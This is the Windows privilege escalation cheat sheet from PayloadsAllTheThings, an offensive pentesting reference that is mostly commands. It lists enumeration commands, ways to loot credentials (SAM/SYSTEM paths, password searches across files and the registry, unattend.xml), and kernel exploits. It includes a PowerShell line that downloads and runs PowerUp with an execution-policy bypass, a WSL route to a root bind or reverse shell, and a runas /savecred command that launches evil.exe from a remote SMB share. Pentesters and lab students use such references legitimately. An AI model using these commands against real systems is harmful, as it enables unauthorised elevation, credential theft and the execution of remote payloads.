PayloadsAllTheThings/Methodology and Resources/Windows - Privilege Escalation.md

Windows - Privilege Escalation

Tools

• Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock
• (Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities
• BeRoot - Privilege Escalation Project - Windows / Linux / Mac
• Windows-Exploit-Suggester
• windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
• Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind

Windows Version and Configuration

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe

Architecture

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

List all env variables

set
Get-ChildItem Env: | ft Key,Value

List all drives

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

User Enumeration

Get current username

echo %USERNAME% || whoami
$env:username

List user privilege

whoami /priv

List all users

net user
net users
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator
net user admin
net user %USERNAME%

List all local groups

net localgroup
Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

Network Enumeration

List all network interfaces, IP, and DNS.

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firware state and current configuration

netsh advfirewall firewall dump

List all network shares

net share

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

Looting for passwords

SAM and SYSTEM files

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Search for file contents**

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config

Search for a file with a certain filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

Search the registry for key names

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

Read a value of a certain sub key

REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList

Passwords in unattend.xml

Location of the unattend.xml files

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Example content

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
     <Password>*SENSITIVE*DATA*DELETED*</Password>
     <Enabled>true</Enabled>
     <Username>Administrateur</Username>
    </AutoLogon>

    <UserAccounts>
     <LocalAccounts>
      <LocalAccount wcm:action="add">
       <Password>*SENSITIVE*DATA*DELETED*</Password>
       <Group>administrators;users</Group>
       <Name>Administrateur</Name>
      </LocalAccount>
     </LocalAccounts>
    </UserAccounts>

The Metasploit module post/windows/gather/enum_unattend looks for these files.

IIS Web config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

Processes Enumeration and Tasks

What processes are running?

tasklist /v
net start
sc query
Get-Service
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

Which processes are running as "system"

tasklist /v /fi "username eq system"

Do you have powershell magic?

REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion

List installed programs

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Scheduled tasks

schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Startup tasks

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

PowerSploit's PowerUp

Spot the weak service using PowerSploit's PowerUp

powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

Windows Subsystem for Linux (WSL)

Technique borrowed from Warlockobama's tweet

With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse.

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Alternatively you can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Unquoted Service Paths

The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Kernel Exploit

List of exploits kernel : https://github.com/SecWiki/windows-kernel-exploits

#Security Bulletin   #KB     #Description    #Operating System

• MS17-017 　[KB4013081]　　[GDI Palette Objects Local Privilege Escalation]　　(windows 7/8)
• CVE-2017-8464 　[LNK Remote Code Execution Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
• CVE-2017-0213 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
• CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
• CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
• MS17-010 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)
• MS16-135 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)
• MS16-111 　[KB3186973]　　[kernel api]　　(Windows 10 10586 (32/64)/8.1)
• MS16-098 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)
• MS16-075 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)
• MS16-034 　[KB3143145]　　[Kernel Driver]　　(2008/7/8/10/2012)
• MS16-032 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)
• MS16-016 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)
• MS16-014 　[K3134228]　　[remote code execution]　　(2008/Vista/7)
  ...
• MS03-026 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)

Runas

Use the cmdkey to list the stored credentials on the machine.

cmdkey /list
Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator

Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

References

• The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte
• Basic Linux Privilege Escalation
• Windows Privilege Escalation Fundamentals
• TOP–10 ways to boost your privileges in Windows systems - hackmag
• The SYSTEM Challenge
• Windows Privilege Escalation Guide - absolomb's security blog
• Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell
• Pentestlab.blog - WPE-01 - Stored Credentials
• Pentestlab.blog - WPE-02 - Windows Kernel
• Pentestlab.blog - WPE-03 - DLL Injection
• Pentestlab.blog - WPE-04 - Weak Service Permissions
• Pentestlab.blog - WPE-05 - DLL Hijacking
• Pentestlab.blog - WPE-06 - Hot Potato
• Pentestlab.blog - WPE-07 - Group Policy Preferences
• Pentestlab.blog - WPE-08 - Unquoted Service Path
• Pentestlab.blog - WPE-09 - Always Install Elevated
• Pentestlab.blog - WPE-10 - Token Manipulation
• Pentestlab.blog - WPE-11 - Secondary Logon Handle
• Pentestlab.blog - WPE-12 - Insecure Registry Permissions
• Pentestlab.blog - WPE-13 - Intel SYSRET